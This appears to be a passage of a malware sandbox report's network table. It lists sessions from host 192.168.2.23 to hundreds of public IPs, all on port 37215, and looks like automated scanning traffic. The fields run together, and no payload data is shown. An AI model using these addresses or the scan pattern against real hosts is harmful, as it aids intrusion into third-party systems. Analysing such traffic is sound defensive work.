                                          11548192.168.2.2351198197.160.171.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11549192.168.2.234948441.244.239.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11550192.168.2.2346806129.150.147.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11551192.168.2.233529241.27.32.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11552192.168.2.235447241.57.231.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11553192.168.2.2339914157.226.137.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11554192.168.2.2337990197.2.137.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11555192.168.2.2336610145.17.38.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11556192.168.2.2359310197.13.186.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11557192.168.2.2338336157.227.169.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11558192.168.2.2335092197.71.112.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11559192.168.2.2357272177.26.79.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11560192.168.2.2338886157.25.8.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11561192.168.2.233491041.137.126.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11562192.168.2.233682241.102.91.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11563192.168.2.2352570102.15.144.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11564192.168.2.2358584199.71.3.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11565192.168.2.2339706158.146.85.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11566192.168.2.2342072197.184.60.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11567192.168.2.2350950197.198.239.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11568192.168.2.233661441.254.14.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11569192.168.2.2357920157.35.251.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11570192.168.2.2353624158.128.221.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11571192.168.2.235850441.53.145.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11572192.168.2.2338704187.8.90.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11573192.168.2.2358590144.88.93.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11574192.168.2.2340314197.115.157.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11575192.168.2.2348200197.218.231.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11576192.168.2.2357964197.227.168.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11577192.168.2.2344214197.59.144.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11578192.168.2.2352972157.254.154.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11579192.168.2.234352241.38.172.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11580192.168.2.2342230197.186.96.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11581192.168.2.233604441.115.119.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11582192.168.2.2350984157.136.171.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11583192.168.2.2351660197.60.81.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11584192.168.2.2341146197.180.216.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11585192.168.2.2350876157.10.59.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11586192.168.2.235895227.191.76.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11587192.168.2.233678060.68.5.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11588192.168.2.2353408157.204.210.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11589192.168.2.2339850157.168.125.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11590192.168.2.2359974186.168.200.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11591192.168.2.2333458197.10.146.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11592192.168.2.2339390197.232.232.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11593192.168.2.235563647.133.203.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11594192.168.2.235201418.79.236.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11595192.168.2.2360530197.244.136.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11596192.168.2.2359922157.219.112.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11597192.168.2.235089490.201.252.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11598192.168.2.2354662157.101.57.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11599192.168.2.2342254157.141.223.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11600192.168.2.2347834157.213.172.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11601192.168.2.233984841.34.226.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11602192.168.2.2342892179.109.23.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11603192.168.2.2351904157.107.182.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11604192.168.2.2344252197.180.48.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11605192.168.2.234983041.152.175.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11606192.168.2.234998041.195.28.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11607192.168.2.234437641.219.145.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11608192.168.2.234921041.34.143.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11609192.168.2.2353708157.46.63.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11610192.168.2.2350410197.241.92.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11611192.168.2.2356692157.121.100.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11612192.168.2.234333441.210.144.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11613192.168.2.233826841.143.182.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11614192.168.2.2337314197.141.80.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11615192.168.2.2343818157.124.69.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11616192.168.2.2340126157.50.53.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11617192.168.2.2360136197.121.153.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11618192.168.2.2347838197.202.191.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11619192.168.2.233965241.70.96.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11620192.168.2.2347956157.209.65.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11621192.168.2.2343952147.3.94.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11622192.168.2.2333044197.7.235.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11623192.168.2.235475841.113.128.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11624192.168.2.2341096112.165.206.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11625192.168.2.235023281.140.20.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11626192.168.2.2355710197.165.24.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11627192.168.2.233802041.200.111.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11628192.168.2.2349150197.232.108.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11629192.168.2.2337918157.243.148.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11630192.168.2.2345462167.15.5.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11631192.168.2.2342204157.67.151.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11632192.168.2.2348166157.55.52.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11633192.168.2.2357916157.148.222.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11634192.168.2.235717841.114.167.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11635192.168.2.234437441.85.60.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11636192.168.2.2337726157.185.6.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11637192.168.2.2353074197.210.48.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11638192.168.2.2359106203.173.169.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11639192.168.2.23516229.122.88.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11640192.168.2.234849841.67.126.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11641192.168.2.2346974157.254.248.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11642192.168.2.2353718157.126.110.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11643192.168.2.2334464157.7.244.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11644192.168.2.2342878157.69.82.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11645192.168.2.234817241.109.129.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11646192.168.2.2343418157.190.252.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11647192.168.2.2348890197.213.62.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11648192.168.2.2338986157.228.101.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11649192.168.2.236015623.124.15.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11650192.168.2.235281441.139.44.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11651192.168.2.2338858157.94.55.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11652192.168.2.235511441.12.203.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11653192.168.2.2351578197.170.60.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11654192.168.2.2358292197.132.238.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11655192.168.2.234228641.166.216.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11656192.168.2.2347122197.166.242.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11657192.168.2.236029041.105.44.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11658192.168.2.2339984171.172.158.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11659192.168.2.235955241.44.245.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11660192.168.2.234644041.9.42.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11661192.168.2.2345396157.20.215.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11662192.168.2.2342806197.118.226.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11663192.168.2.235986825.27.51.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11664192.168.2.2340928159.218.199.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11665192.168.2.233819090.219.58.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11666192.168.2.235095441.59.147.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11667192.168.2.2341970197.18.219.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11668192.168.2.2356822101.42.29.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11669192.168.2.2357054157.50.144.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11670192.168.2.2350512157.80.163.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11671192.168.2.236013241.92.158.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11672192.168.2.234842041.17.70.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11673192.168.2.2337312170.2.153.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11674192.168.2.2350430157.134.14.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11675192.168.2.2334568118.210.236.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11676192.168.2.2356122157.196.83.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11677192.168.2.235442841.162.49.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11678192.168.2.2354198197.253.80.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11679192.168.2.235544841.129.245.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11680192.168.2.2345026203.235.99.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11681192.168.2.2350054191.17.72.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11682192.168.2.234158441.162.216.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11683192.168.2.2360094157.228.238.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11684192.168.2.2340206197.172.169.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11685192.168.2.2333752157.180.195.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11686192.168.2.2349370157.20.39.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11687192.168.2.2354332197.181.92.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11688192.168.2.2352716157.23.192.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11689192.168.2.2344454157.228.95.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11690192.168.2.2344400197.125.225.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11691192.168.2.2355780197.235.6.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11692192.168.2.2339756222.51.182.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11693192.168.2.2340560157.106.43.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11694192.168.2.2345228197.61.101.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11695192.168.2.2336534197.31.65.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11696192.168.2.234849641.48.24.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11697192.168.2.2360134157.94.221.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11698192.168.2.2358580157.203.109.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11699192.168.2.2333250157.30.121.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11700192.168.2.233983647.90.160.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11701192.168.2.235198041.176.20.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11702192.168.2.233712041.6.254.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11703192.168.2.2349816197.30.103.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11704192.168.2.2339806197.221.130.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11705192.168.2.2339748157.187.159.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11706192.168.2.233984641.47.84.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11707192.168.2.2357118126.33.79.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11708192.168.2.2334262180.218.97.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11709192.168.2.235450041.34.50.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11710192.168.2.2357380197.202.140.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11711192.168.2.234123241.89.44.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11712192.168.2.234497041.63.147.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11713192.168.2.2338798197.31.129.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11714192.168.2.234208441.120.183.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11715192.168.2.235855841.93.118.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11716192.168.2.2349604157.38.24.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11717192.168.2.235404441.163.116.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11718192.168.2.2343640157.202.174.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11719192.168.2.2359680197.231.31.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11720192.168.2.2337190103.182.136.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11721192.168.2.2356848197.18.131.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11722192.168.2.2351066157.22.130.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11723192.168.2.234251890.15.87.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11724192.168.2.2355878159.227.78.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11725192.168.2.2359794157.75.168.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11726192.168.2.2334776183.109.221.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11727192.168.2.2333412157.153.160.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11728192.168.2.2342736157.186.86.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11729192.168.2.2349900157.3.73.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11730192.168.2.2340022157.202.184.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11731192.168.2.2351874157.21.198.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11732192.168.2.2354064157.21.162.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11733192.168.2.2355012105.80.13.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11734192.168.2.2350464157.39.134.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11735192.168.2.2348952180.100.163.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11736192.168.2.2348684157.189.74.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11737192.168.2.2350884172.57.52.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11738192.168.2.233701041.219.227.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11739192.168.2.234534241.171.152.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11740192.168.2.233938839.222.32.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11741192.168.2.234821241.83.141.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11742192.168.2.2358682197.126.15.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11743192.168.2.2339500197.162.197.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11744192.168.2.234869296.203.229.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11745192.168.2.235493697.152.13.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11746192.168.2.2355952157.80.207.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11747192.168.2.2350748197.17.131.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11748192.168.2.2354354157.165.128.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11749192.168.2.235712641.155.151.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11750192.168.2.235093441.190.188.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11751192.168.2.2334442197.152.159.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11752192.168.2.2349632197.159.249.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11753192.168.2.2344600211.37.250.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11754192.168.2.2351160157.131.173.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11755192.168.2.2347972197.191.192.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11756192.168.2.2339894197.23.170.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11757192.168.2.2356490157.36.11.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11758192.168.2.2343646157.115.147.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11759192.168.2.2335538157.88.39.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11760192.168.2.2334262197.190.20.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11761192.168.2.235820463.180.31.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11762192.168.2.234714241.226.4.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11763192.168.2.235395678.165.132.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11764192.168.2.2339592141.197.101.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11765192.168.2.2336592157.102.66.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11766192.168.2.2333760197.41.156.8337215
